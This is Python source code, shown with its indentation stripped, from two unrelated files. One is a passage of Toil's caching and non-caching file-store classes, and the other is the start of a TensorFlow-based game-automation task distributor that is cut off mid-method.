# almost the same thing except for the direction of the os.link hence we're
# writing them together.
if callingFunc == 'read': # and mutable is inherently False
src = cachedFile
dest = localFilePath
# To mirror behaviour of shutil.copyfile
if os.path.exists(dest):
os.remove(dest)
else: # write
src = localFilePath
dest = cachedFile
try:
os.link(src, dest)
except OSError as err:
if err.errno != errno.EEXIST:
raise
# If we get the EEXIST error, it can only be from write since in read we are
# explicitly deleting the file. This shouldn't happen with the .partial
# logic hence we raise a cache error.
raise CacheError('Attempting to recache a file %s.' % src)
else:
# Chmod the cached file. Cached files can never be modified.
os.chmod(cachedFile, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
# Return the filesize of cachedFile to the job and increase the cached size
# The values passed here don't matter since rFS looks at the file only for
# the stat
self.returnFileSize(jobStoreFileID, localFilePath, lockFileHandle,
fileAlreadyCached=False)
if callingFunc == 'read':
logger.debug('CACHE: Read file with ID \'%s\' from the cache.' %
jobStoreFileID)
else:
logger.debug('CACHE: Added file with ID \'%s\' to the cache.' %
jobStoreFileID)
def returnFileSize(self, fileStoreID, cachedFileSource, lockFileHandle,
fileAlreadyCached=False):
"""
Returns the fileSize of the file described by fileStoreID to the job requirements pool
if the file was recently added to, or read from cache (A job that reads n bytes from
cache doesn't really use those n bytes as a part of it's job disk since cache is already
accounting for that disk space).
:param fileStoreID: fileStore ID of the file bein added to cache
:param str cachedFileSource: File being added to cache
:param file lockFileHandle: Open file handle to the cache lock file
:param bool fileAlreadyCached: A flag to indicate whether the file was already cached or
not. If it was, then it means that you don't need to add the filesize to cache again.
"""
fileSize = os.stat(cachedFileSource).st_size
cacheInfo = self._CacheState._load(self.cacheStateFile)
# If the file isn't cached, add the size of the file to the cache pool. However, if the
# nlink threshold is not 1 - i.e. it is 2 (it can only be 1 or 2), then don't do this
# since the size of the file is accounted for by the file store copy.
if not fileAlreadyCached and self.nlinkThreshold == 1:
cacheInfo.cached += fileSize
cacheInfo.sigmaJob -= fileSize
if not cacheInfo.isBalanced():
self.logToMaster('CACHE: The cache was not balanced on returning file size',
logging.WARN)
# Add the info to the job specific cache info
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(fileStoreID, cachedFileSource, fileSize, True)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
@staticmethod
def _isHidden(filePath):
"""
This is a function that checks whether filePath is hidden
:param str filePath: Path to the file under consideration
:return: A boolean indicating whether the file is hidden or not.
:rtype: bool
"""
assert isinstance(filePath, (str, bytes))
# I can safely assume i will never see an empty string because this is always called on
# the results of an os.listdir()
return filePath[0] in ('.', '_')
def cleanCache(self, newJobReqs):
"""
Cleanup all files in the cache directory to ensure that at lead newJobReqs are available
for use.
:param float newJobReqs: the total number of bytes of files allowed in the cache.
"""
with self._CacheState.open(self) as cacheInfo:
# Add the new job's disk requirements to the sigmaJobDisk variable
cacheInfo.sigmaJob += newJobReqs
# Initialize the job state here. we use a partial in the jobSpecificFiles call so
# that this entire thing is pickleable. Based on answer by user Nathaniel Gentile at
# http://stackoverflow.com/questions/2600790
assert self.jobID not in cacheInfo.jobState
cacheInfo.jobState[self.jobID] = {
'jobName': self.jobName,
'jobReqs': newJobReqs,
'jobDir': self.localTempDir,
'jobSpecificFiles': defaultdict(partial(defaultdict,int)),
'filesToFSIDs': defaultdict(set),
'pid': os.getpid(),
'deferredFunctions': []}
# If the caching equation is balanced, do nothing.
if cacheInfo.isBalanced():
return None
# List of deletable cached files. A deletable cache file is one
# that is not in use by any other worker (identified by the number of symlinks to
# the file)
allCacheFiles = [os.path.join(self.localCacheDir, x)
for x in os.listdir(self.localCacheDir)
if not self._isHidden(x)]
allCacheFiles = [(path, os.stat(path)) for path in allCacheFiles]
# TODO mtime vs ctime
deletableCacheFiles = {(path, inode.st_mtime, inode.st_size)
for path, inode in allCacheFiles
if inode.st_nlink == self.nlinkThreshold}
# Sort in descending order of mtime so the first items to be popped from the list
# are the least recently created.
deletableCacheFiles = sorted(deletableCacheFiles, key=lambda x: (-x[1], -x[2]))
logger.debug('CACHE: Need %s bytes for new job. Detecting an estimated %s (out of a '
'total %s) bytes available for running the new job. The size of the cache '
'is %s bytes.', newJobReqs,
(cacheInfo.total - (cacheInfo.cached + cacheInfo.sigmaJob - newJobReqs)),
cacheInfo.total, cacheInfo.cached)
logger.debug('CACHE: Evicting files to make room for the new job.')
# Now do the actual file removal
totalEvicted = 0
while not cacheInfo.isBalanced() and len(deletableCacheFiles) > 0:
cachedFile, fileCreateTime, cachedFileSize = deletableCacheFiles.pop()
os.remove(cachedFile)
cacheInfo.cached -= cachedFileSize if self.nlinkThreshold != 2 else 0
totalEvicted += cachedFileSize
assert cacheInfo.cached >= 0
logger.debug('CACHE: Evicted file with ID \'%s\' (%s bytes)' %
(self.decodedFileID(cachedFile), cachedFileSize))
logger.debug('CACHE: Evicted a total of %s bytes. Available space is now %s bytes.',
totalEvicted,
(cacheInfo.total - (cacheInfo.cached + cacheInfo.sigmaJob - newJobReqs)))
if not cacheInfo.isBalanced():
raise CacheUnbalancedError()
def removeSingleCachedFile(self, fileStoreID):
"""
Removes a single file described by the fileStoreID from the cache forcibly.
"""
with self._CacheState.open(self) as cacheInfo:
cachedFile = self.encodedFileID(fileStoreID)
cachedFileStats = os.stat(cachedFile)
# We know the file exists because this function was called in the if block. So we
# have to ensure nothing has changed since then.
assert cachedFileStats.st_nlink == self.nlinkThreshold, 'Attempting to delete ' + \
'a global file that is in use by another job.'
# Remove the file size from the cached file size if the jobstore is not fileJobStore
# and then delete the file
os.remove(cachedFile)
if self.nlinkThreshold != 2:
cacheInfo.cached -= cachedFileStats.st_size
if not cacheInfo.isBalanced():
self.logToMaster('CACHE: The cache was not balanced on removing single file',
logging.WARN)
self.logToMaster('CACHE: Successfully removed file with ID \'%s\'.' % fileStoreID)
return None
def setNlinkThreshold(self):
# FIXME Can't do this at the top because of loopy (circular) import errors
from toil.jobStores.fileJobStore import FileJobStore
if (isinstance(self.jobStore, FileJobStore) and
os.stat(os.path.dirname(self.localCacheDir)).st_dev == os.stat(
self.jobStore.jobStoreDir).st_dev):
self.nlinkThreshold = 2
else:
self.nlinkThreshold = 1
def _accountForNlinkEquals2(self, localFilePath):
"""
This is a utility function that accounts for the fact that if nlinkThreshold == 2, the
size of the file is accounted for by the file store copy of the file and thus the file
size shouldn't be added to the cached file sizes.
:param str localFilePath: Path to the local file that was linked to the file store copy.
"""
fileStats = os.stat(localFilePath)
assert fileStats.st_nlink >= self.nlinkThreshold
with self._CacheState.open(self) as cacheInfo:
cacheInfo.sigmaJob -= fileStats.st_size
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.updateJobReqs(fileStats.st_size, 'remove')
def returnJobReqs(self, jobReqs):
"""
This function returns the effective job requirements back to the pool after the job
completes. It also deletes the local copies of files with the cache lock held.
:param float jobReqs: Original size requirement of the job
"""
# Since we are only reading this job's specific values from the state file, we don't
# need a lock
jobState = self._JobState(self._CacheState._load(self.cacheStateFile
).jobState[self.jobID])
for x in list(jobState.jobSpecificFiles.keys()):
self.deleteLocalFile(x)
with self._CacheState.open(self) as cacheInfo:
cacheInfo.sigmaJob -= jobReqs
# assert cacheInfo.isBalanced() # commenting this out for now. God speed
class _CacheState(FileStore._StateFile):
"""
Utility class to read and write the cache lock file. Also for checking whether the
caching equation is balanced or not. It extends the _StateFile class to add other cache
related functions.
"""
@classmethod
@contextmanager
def open(cls, outer=None):
"""
This is a context manager that opens the cache state file and reads it into an object
that is returned to the user in the yield
"""
assert outer is not None
with outer.cacheLock():
cacheInfo = cls._load(outer.cacheStateFile)
yield cacheInfo
cacheInfo.write(outer.cacheStateFile)
def isBalanced(self):
"""
Checks for the inequality of the caching equation, i.e.
cachedSpace + sigmaJobDisk <= totalFreeSpace
Essentially, the sum of all cached file + disk requirements of all running jobs
should always be less than the available space on the system
:return: Boolean for equation is balanced (T) or not (F)
:rtype: bool
"""
return self.cached + self.sigmaJob <= self.total
def purgeRequired(self, jobReqs):
"""
Similar to isBalanced, however it looks at the actual state of the system and
decides whether an eviction is required.
:return: Is a purge required(T) or no(F)
:rtype: bool
"""
return not self.isBalanced()
# totalStats = os.statvfs(self.cacheDir)
# totalFree = totalStats.f_bavail * totalStats.f_frsize
# return totalFree < jobReqs
# Methods related to the deferred function logic
@classmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
:param toil.fileStore.CachingFileStore._CacheState nodeInfo: The state of the node cache as
a _CacheState object
"""
# A list of tuples of (hashed job id, pid or process running job)
registeredJobs = [(jid, state['pid']) for jid, state in list(nodeInfo.jobState.items())]
for jobID, jobPID in registeredJobs:
if not cls._pidExists(jobPID):
jobState = CachingFileStore._JobState(nodeInfo.jobState[jobID])
logger.warning('Detected that job (%s) prematurely terminated. Fixing the state '
'of the cache.', jobState.jobName)
if not batchSystemShutdown:
logger.debug("Returning dead job's used disk to cache.")
# Delete the old work directory if it still exists, to remove unwanted nlinks.
# Do this only during the life of the program and dont' do it during the
# batch system cleanup. Leave that to the batch system cleanup code.
if os.path.exists(jobState.jobDir):
shutil.rmtree(jobState.jobDir)
nodeInfo.sigmaJob -= jobState.jobReqs
logger.debug('Running user-defined deferred functions.')
cls._runDeferredFunctions(jobState.deferredFunctions)
# Remove job from the cache state file
nodeInfo.jobState.pop(jobID)
def _registerDeferredFunction(self, deferredFunction):
with self._CacheState.open(self) as cacheInfo:
cacheInfo.jobState[self.jobID]['deferredFunctions'].append(deferredFunction)
logger.debug('Registered "%s" with job "%s".', deferredFunction, self.jobName)
class _JobState(object):
"""
This is a utility class to handle the state of a job in terms of it's current disk
requirements, working directory, and job specific files.
"""
def __init__(self, dictObj):
assert isinstance(dictObj, dict)
self.__dict__.update(dictObj)
@classmethod
def updateJobSpecificFiles(cls, outer, jobStoreFileID, filePath, fileSize, cached):
"""
This method will update the job specifc files in the job state object. It deals with
opening a cache lock file, etc.
:param toil.fileStore.CachingFileStore outer: An instance of CachingFileStore
:param str jobStoreFileID: job store Identifier for the file
:param str filePath: The path to the file
:param float fileSize: The size of the file (may be deprecated soon)
:param bool cached: T : F : None :: cached : not cached : mutably read
"""
with outer._CacheState.open(outer) as cacheInfo:
jobState = cls(cacheInfo.jobState[outer.jobID])
jobState.addToJobSpecFiles(jobStoreFileID, filePath, fileSize, cached)
cacheInfo.jobState[outer.jobID] = jobState.__dict__
def addToJobSpecFiles(self, jobStoreFileID, filePath, fileSize, cached):
"""
This is the real method that actually does the updations.
:param jobStoreFileID: job store Identifier for the file
:param filePath: The path to the file
:param fileSize: The size of the file (may be deprecated soon)
:param cached: T : F : None :: cached : not cached : mutably read
"""
# If there is no entry for the jsfID, make one. self.jobSpecificFiles is a default
# dict of default dicts and the absence of a key will return an empty dict
# (equivalent to a None for the if)
if not self.jobSpecificFiles[jobStoreFileID]:
self.jobSpecificFiles[jobStoreFileID][filePath] = fileSize
else:
# If there's no entry for the filepath, create one
if not self.jobSpecificFiles[jobStoreFileID][filePath]:
self.jobSpecificFiles[jobStoreFileID][filePath] = fileSize
# This should never happen
else:
raise RuntimeError()
# Now add the file to the reverse mapper. This will speed up cleanup and local file
# deletion.
self.filesToFSIDs[filePath].add(jobStoreFileID)
if cached:
self.updateJobReqs(fileSize, 'add')
def updateJobReqs(self, fileSize, actions):
"""
This method will update the current state of the disk required by the job after the
most recent cache operation.
:param fileSize: Size of the last file added/removed from the cache
:param actions: 'add' or 'remove'
"""
assert actions in ('add', 'remove')
multiplier = 1 if actions == 'add' else -1
# If the file was added to the cache, the value is subtracted from the requirements,
# and it is added if the file was removed form the cache.
self.jobReqs -= (fileSize * multiplier)
def isPopulated(self):
return self.__dict__ != {}
class HarbingerFile(object):
"""
Represents the placeholder file that harbinges the arrival of a local copy of a file in
the job store.
"""
def __init__(self, fileStore, fileStoreID=None, cachedFileName=None):
"""
Returns the harbinger file name for a cached file, or for a job store ID
:param class fileStore: The 'self' object of the fileStore class
:param str fileStoreID: The file store ID for an input file
:param str cachedFileName: The cache file name corresponding to a given file
"""
# We need either a file store ID, or a cached file name, but not both (XOR).
assert (fileStoreID is None) != (cachedFileName is None)
if fileStoreID is not None:
self.fileStoreID = fileStoreID
cachedFileName = fileStore.encodedFileID(fileStoreID)
else:
self.fileStoreID = fileStore.decodedFileID(cachedFileName)
self.fileStore = fileStore
self.harbingerFileName = '/.'.join(os.path.split(cachedFileName)) + '.harbinger'
def write(self):
self.fileStore.logToMaster('CACHE: Creating a harbinger file for (%s). '
% self.fileStoreID, logging.DEBUG)
with open(self.harbingerFileName + '.tmp', 'w') as harbingerFile:
harbingerFile.write(str(os.getpid()))
# Make this File read only to prevent overwrites
os.chmod(self.harbingerFileName + '.tmp', 0o444)
os.rename(self.harbingerFileName + '.tmp', self.harbingerFileName)
def waitOnDownload(self, lockFileHandle):
"""
This method is called when a readGlobalFile process is waiting on another process to
write a file to the cache.
:param lockFileHandle: The open handle to the cache lock file
"""
while self.exists():
logger.debug('CACHE: Waiting for another worker to download file with ID %s.'
% self.fileStoreID)
# Ensure that the process downloading the file is still alive. The PID will
# be in the harbinger file.
pid = self.read()
if FileStore._pidExists(pid):
# Release the file lock and then wait for a bit before repeating.
flock(lockFileHandle, LOCK_UN)
time.sleep(20)
# Grab the file lock before repeating.
flock(lockFileHandle, LOCK_EX)
else:
# The process that was supposed to download the file has died so we need
# to remove the harbinger.
self._delete()
def read(self):
return int(open(self.harbingerFileName).read())
def exists(self):
return os.path.exists(self.harbingerFileName)
def delete(self):
"""
Acquires the cache lock then attempts to delete the harbinger file.
"""
with self.fileStore.cacheLock():
self._delete()
def _delete(self):
"""
This function assumes you already have the cache lock!
"""
assert self.exists()
self.fileStore.logToMaster('CACHE: Deleting the harbinger file for (%s)' %
self.fileStoreID, logging.DEBUG)
os.remove(self.harbingerFileName)
# Functions related to async updates
def asyncWrite(self):
"""
A function to write files asynchronously to the job store such that subsequent jobs are
not delayed by a long write operation.
"""
try:
while True:
try:
# Block for up to two seconds waiting for a file
args = self.queue.get(timeout=2)
except Empty:
# Check if termination event is signaled
# (set in the event of an exception in the worker)
if self._terminateEvent.isSet():
raise RuntimeError("The termination flag is set, exiting")
continue
# Normal termination condition is getting None from queue
if args is None:
break
inputFileHandle, jobStoreFileID = args
cachedFileName = self.encodedFileID(jobStoreFileID)
# Ensure that the harbinger exists in the cache directory and that the PID
# matches that of this writing thread.
# If asyncWrite is ported to subprocesses instead of threads in the future,
# insert logic here to securely overwrite the harbinger file.
harbingerFile = self.HarbingerFile(self, cachedFileName=cachedFileName)
assert harbingerFile.exists()
assert harbingerFile.read() == int(os.getpid())
# We pass in a fileHandle, rather than the file-name, in case
# the file itself is deleted. The fileHandle itself should persist
# while we maintain the open file handle
with self.jobStore.updateFileStream(jobStoreFileID) as outputFileHandle:
shutil.copyfileobj(inputFileHandle, outputFileHandle)
inputFileHandle.close()
# Remove the file from the lock files
with self._pendingFileWritesLock:
self._pendingFileWrites.remove(jobStoreFileID)
# Remove the harbinger file
harbingerFile.delete()
except:
self._terminateEvent.set()
raise
def _updateJobWhenDone(self):
"""
Asynchronously update the status of the job on the disk, first waiting \
until the writing threads have finished and the input blockFn has stopped \
blocking.
"""
def asyncUpdate():
try:
# Wait till all file writes have completed
for i in range(len(self.workers)):
self.queue.put(None)
for thread in self.workers:
thread.join()
# Wait till input block-fn returns - in the event of an exception
# this will eventually terminate
self.inputBlockFn()
# Check the terminate event, if set we can not guarantee
# that the workers ended correctly, therefore we exit without
# completing the update
if self._terminateEvent.isSet():
raise RuntimeError("The termination flag is set, exiting before update")
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
finally:
# Indicate that _blockFn can return
# This code will always run
self.updateSemaphore.release()
# The update semaphore is held while the job is written to the job store
try:
self.updateSemaphore.acquire()
t = Thread(target=asyncUpdate)
t.start()
except:
# This is to ensure that the semaphore is released in a crash to stop a deadlock
# scenario
self.updateSemaphore.release()
raise
def _blockFn(self):
self.updateSemaphore.acquire()
self.updateSemaphore.release() # Release so that the block function can be recalled
# This works, because once acquired the semaphore will not be acquired
# by _updateJobWhenDone again.
return
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The directory that will contain the cache state file.
"""
cacheInfo = cls._CacheState._load(os.path.join(dir_, '_cacheState'))
cls.findAndHandleDeadJobs(cacheInfo, batchSystemShutdown=True)
shutil.rmtree(dir_)
def __del__(self):
"""
Cleanup function that is run when destroying the class instance that ensures that all the
file writing threads exit.
"""
self.updateSemaphore.acquire()
for i in range(len(self.workers)):
self.queue.put(None)
for thread in self.workers:
thread.join()
self.updateSemaphore.release()
class NonCachingFileStore(FileStore):
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
self.jobStore = jobStore
self.jobGraph = jobGraph
self.jobName = str(self.jobGraph)
self.localTempDir = os.path.abspath(localTempDir)
self.inputBlockFn = inputBlockFn
self.jobsToDelete = set()
self.loggingMessages = []
self.filesToDelete = set()
super(NonCachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, inputBlockFn)
# This will be defined in the `open` method.
self.jobStateFile = None
self.localFileMap = defaultdict(list)
@contextmanager
def open(self, job):
jobReqs = job.disk
startingDir = os.getcwd()
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
self.findAndHandleDeadJobs(self.workFlowDir)
self.jobStateFile = self._createJobStateFile()
freeSpace, diskSize = getFileSystemSize(self.localTempDir)
if freeSpace <= 0.1 * diskSize:
logger.warning('Starting job %s with less than 10%% of disk space remaining.',
self.jobName)
try:
os.chdir(self.localTempDir)
yield
finally:
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / jobReqs * 100 if
jobReqs > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(jobReqs),
requestedDisk=jobReqs))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > jobReqs:
self.logToMaster("Job used more disk than requested. Consider modifying the user "
"script to avoid the chance of failure due to incorrectly "
"requested resources. " + logString, level=logging.WARNING)
os.chdir(startingDir)
jobState = self._readJobState(self.jobStateFile)
deferredFunctions = jobState['deferredFunctions']
failures = self._runDeferredFunctions(deferredFunctions)
for failure in failures:
self.logToMaster('Deferred function "%s" failed.' % failure, logging.WARN)
# Finally delete the job from the worker
os.remove(self.jobStateFile)
def writeGlobalFile(self, localFileName, cleanup=False):
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
cleanupID = None if not cleanup else self.jobGraph.jobStoreID
fileStoreID = self.jobStore.writeFile(absLocalFileName, cleanupID)
self.localFileMap[fileStoreID].append(absLocalFileName)
return FileID.forPath(fileStoreID, absLocalFileName)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
if userPath is not None:
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
raise RuntimeError(' File %s ' % localFilePath + ' exists. Cannot Overwrite.')
else:
localFilePath = self.getLocalTempFileName()
self.jobStore.readFile(fileStoreID, localFilePath, symlink=symlink)
self.localFileMap[fileStoreID].append(localFilePath)
return localFilePath
@contextmanager
def readGlobalFileStream(self, fileStoreID):
with self.jobStore.readFileStream(fileStoreID) as f:
yield f
def exportFile(self, jobStoreFileID, dstUrl):
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def deleteLocalFile(self, fileStoreID):
try:
localFilePaths = self.localFileMap.pop(fileStoreID)
except KeyError:
raise OSError(errno.ENOENT, "Attempting to delete a non-local file")
else:
for localFilePath in localFilePaths:
os.remove(localFilePath)
def deleteGlobalFile(self, fileStoreID):
try:
self.deleteLocalFile(fileStoreID)
except OSError as e:
if e.errno == errno.ENOENT:
# the file does not exist locally, so no local deletion necessary
pass
else:
raise
self.filesToDelete.add(fileStoreID)
def _blockFn(self):
# there is no asynchronicity in this file store so no need to block at all
return True
def _updateJobWhenDone(self):
try:
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
def __del__(self):
"""
Cleanup function that is run when destroying the class instance. Nothing to do since there
are no async write events.
"""
pass
# Functions related to the deferred function logic
@classmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
Look at the state of all jobs registered in the individual job state files, and handle them
(clean up the disk, and run any registered defer functions)
:param str nodeInfo: The location of the workflow directory on the node.
:param bool batchSystemShutdown: Is the batch system in the process of shutting down?
:return:
"""
# A list of tuples of (job name, pid or process running job, registered defer functions)
for jobState in cls._getAllJobStates(nodeInfo):
if not cls._pidExists(jobState['jobPID']):
# using same logic to prevent races as CachingFileStore._setupCache
myPID = str(os.getpid())
cleanupFile = os.path.join(jobState['jobDir'], '.cleanup')
with open(os.path.join(jobState['jobDir'], '.' + myPID), 'w') as f:
f.write(myPID)
while True:
try:
os.rename(f.name, cleanupFile)
except OSError as err:
if err.errno == errno.ENOTEMPTY:
with open(cleanupFile, 'r') as f:
cleanupPID = f.read()
if cls._pidExists(int(cleanupPID)):
# Cleanup your own mess. It's only polite.
os.remove(f.name)
break
else:
os.remove(cleanupFile)
continue
else:
raise
else:
logger.warning('Detected that job (%s) prematurely terminated. Fixing the '
'state of the job on disk.', jobState['jobName'])
if not batchSystemShutdown:
logger.debug("Deleting the stale working directory.")
# Delete the old work directory if it still exists. Do this only during
# the life of the program and dont' do it during the batch system
# cleanup. Leave that to the batch system cleanup code.
shutil.rmtree(jobState['jobDir'])
# Run any deferred functions associated with the job
logger.debug('Running user-defined deferred functions.')
cls._runDeferredFunctions(jobState['deferredFunctions'])
break
@staticmethod
def _getAllJobStates(workflowDir):
"""
Generator function that deserializes and yields the job state for every job on the node,
one at a time.
:param str workflowDir: The location of the workflow directory on the node.
:return: dict with keys (jobName, jobPID, jobDir, deferredFunctions)
:rtype: dict
"""
jobStateFiles = []
for root, dirs, files in os.walk(workflowDir):
for filename in files:
if filename == '.jobState':
jobStateFiles.append(os.path.join(root, filename))
for filename in jobStateFiles:
try:
yield NonCachingFileStore._readJobState(filename)
except IOError as e:
if e.errno == 2:
# job finished & deleted its jobState file since the jobState files were discovered
continue
else:
raise
@staticmethod
def _readJobState(jobStateFileName):
with open(jobStateFileName, 'rb') as fH:
state = dill.load(fH)
return state
def _registerDeferredFunction(self, deferredFunction):
with open(self.jobStateFile, 'rb') as fH:
jobState = dill.load(fH)
jobState['deferredFunctions'].append(deferredFunction)
with open(self.jobStateFile + '.tmp', 'wb') as fH:
dill.dump(jobState, fH)
os.rename(self.jobStateFile + '.tmp', self.jobStateFile)
logger.debug('Registered "%s" with job "%s".', deferredFunction, self.jobName)
def _createJobStateFile(self):
"""
Create the job state file for the current job and fill in the required
values.
:return: Path to the job state file
:rtype: str
"""
jobStateFile = os.path.join(self.localTempDir, '.jobState')
jobState = {'jobPID': os.getpid(),
'jobName': self.jobName,
'jobDir': self.localTempDir,
'deferredFunctions': []}
with open(jobStateFile + '.tmp', 'wb') as fH:
dill.dump(jobState, fH)
os.rename(jobStateFile + '.tmp', jobStateFile)
return jobStateFile
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The workflow directory that will contain all the individual worker directories.
"""
cls.findAndHandleDeadJobs(dir_, batchSystemShutdown=True)
class FileID(str):
"""
A class to wrap the job store file id returned by writeGlobalFile and any attributes we may want
to add to it.
"""
def __new__(cls, fileStoreID, *args):
return super(FileID, cls).__new__(cls, fileStoreID)
def __init__(self, fileStoreID, size):
# Don't pass an argument to parent class's __init__.
# In Python 3 we can have super(FileID, self) hand us object's __init__ which chokes on any arguments.
super(FileID, self).__init__()
self.size = size
@classmethod
def forPath(cls, fileStoreID, filePath):
return cls(fileStoreID, os.stat(filePath).st_size)
def shutdownFileStore(workflowDir, workflowID):
"""
Run the deferred functions from any prematurely terminated jobs still lingering on the system
and carry out any necessary filestore-specific cleanup.
This is a destructive operation and it is important to ensure that there are no other running
processes on the system that are modifying or using the file store for this workflow.
This is the intended to be the last call to the file store in a Toil run, called by the
batch system cleanup function upon batch system shutdown.
:param str workflowDir: The path to the cache directory
:param str workflowID: The workflow ID for this invocation of the workflow
"""
cacheDir = os.path.join(workflowDir, cacheDirName(workflowID))
if os.path.exists(cacheDir):
# The presence of the cacheDir suggests this was a cached run. We don't need the cache lock
# for any of this since this is the final cleanup of a job and there should be no other
# conflicting processes using the cache.
CachingFileStore.shutdown(cacheDir)
else:
# This absence of cacheDir suggests otherwise.
NonCachingFileStore.shutdown(workflowDir)
class CacheError(Exception):
"""
Error Raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(CacheError, self).__init__(message)
class CacheUnbalancedError(CacheError):
"""
Raised if file store can't free enough space for caching
"""
message = 'Unable unable to free enough space for caching. This error frequently arises due ' \
'to jobs using more disk than they have requested. Turn on debug logging to see ' \
'more information leading up to this error through cache usage logs.'
def __init__(self):
super(CacheUnbalancedError, self).__init__(self.message)
class IllegalDeletionCacheError(CacheError):
"""
Error Raised if the Toil detects the user deletes a cached file
"""
def __init__(self, deletedFile):
message = 'Cache tracked file (%s) deleted explicitly by user. Use deleteLocalFile to ' \
'delete such files.' % deletedFile
super(IllegalDeletionCacheError, self).__init__(message)
class InvalidSourceCacheError(CacheError):
"""
Error Raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(InvalidSourceCacheError, self).__init__(message)
|
distributor.py
|
import json
import os
import re
import hashlib
import threading
from File.file import File
from Performance import recoder
from .operate import Operate
from .task import *
import GPUtil
import tensorflow as tf
import psutil
# noinspection PyTypeChecker
class Distributor:
def __init__(self, modelConfig, adb_path, labelsName, taskBufferPath="./config/taskBuffer.json"):
self.operate = Operate(modelConfig, adb_path, labelsName)
self.modelConfig = modelConfig
self.taskBufferPath = taskBufferPath
self.taskBuffer = TaskBuffer()
self.taskBuffer.load(self.taskBufferPath)
self.adb_path = adb_path
self.labelsName = labelsName
self.automation = None
self.continuousTask = None
self.mainThread: threading.Thread = None
self.taskEndCallback = None
self.taskType = "UNKNOWN"
self.taskRecord = None
# 初始化状态
self.initIng = False
self.neuralNetworksInited = False
if len(tf.config.experimental.list_physical_devices('GPU')) > 0:
self.operate.interface.setConfig(dynamicMemory=True)
def initModelFile(self):
icModelConfig = self.modelConfig["imageClassificationModel"]
icPath = icModelConfig["dir"]
icModelFileName = icModelConfig["fileName"]
icModelSplitFiles = icModelConfig["files"]
if not os.path.exists(os.path.join(icPath, icModelFileName)):
file = File()
file.mergedFile(icPath, icModelFileName, icModelSplitFiles)
hash_str_cal = self.file_hash(os.path.join(icPath, icModelFileName), hashlib.sha256)
with open(os.path.join(icPath, icModelFileName + ".sha256"), "r") as f:
hash_str_source = f.read()
if hash_str_cal != hash_str_source:
raise Exception("文件合并失败")
@staticmethod
def file_hash(file_path: str, hash_method) -> str:
if not os.path.isfile(file_path):
print('文件不存在。')
return ''
h = hash_method()
with open(file_path, 'rb') as f:
for chunk in iter(lambda: f.read(8192), b''):
h.update(chunk)
return h.hexdigest()
def initDevice(self, device_name=None):
self.initIng = True
automation = Automation(self.operate, self.labelsName, None)
automation.loadGame(device_name=device_name)
self.automation = automation
self.initIng = False
def connectToIPAddress(self, ipAddress):
self.operate.deviceManager.connectToIPAddress(ipAddress)
def initNeuralNetworks(self, enableGPU=False, gpuMemoryLimit=None):
self.initModelFile()
if enableGPU:
logger.info("已启用GPU加速模式")
logger.info("正在检查GPU设备")
sysInfo = self.getSystemInfo()
if len(sysInfo["GPU"]) < 1:
logger.error("未检测到GPU设备")
logger.error("请检是否安装了对应的CUDA和cuDNN驱动")
logger.error("无法启动GPU加速")
logger.warning("切换为CPU模式")
self.operate.interface.setConfig(GPULimit=True)
self.operate.initModel()
else:
if gpuMemoryLimit == "dynamic":
self.operate.interface.setConfig(dynamicMemory=True)
logger.info("GPU设置为动态显存")
else:
gpuMemoryLimit *= sysInfo["GPU"][0]["memoryValue"]
gpuMemoryLimit = int(gpuMemoryLimit)
self.operate.interface.setConfig(Memory=gpuMemoryLimit)
logger.info("GPU显存被限制为{}MB".format(gpuMemoryLimit))
logger.debug(f"GPU设备: {sysInfo['GPU'][0]['description']} 已启用")
self.operate.initModel(enableGPU=True, ocrMemory=2048)
else:
logger.info("初始化CPU设备...")
self.operate.interface.setConfig(GPULimit=True)
self.operate.initModel()
self.neuralNetworksInited = True
def newSingleTask(self, frequency, sanityTimes: int = 0, useStone: bool = False):
task = Task(frequency, sanityTimes, useStone)
self.taskRecord = task.copy()
self.automation.reset(task)
self.mainThread = threading.Thread(target=self.automation.mainLoop, args=(self.eventTaskEnd,))
self.mainThread.start()
self.taskType = "Single"
self.taskBuffer.taskType = "single"
self.taskBuffer.singleTask.frequency = frequency
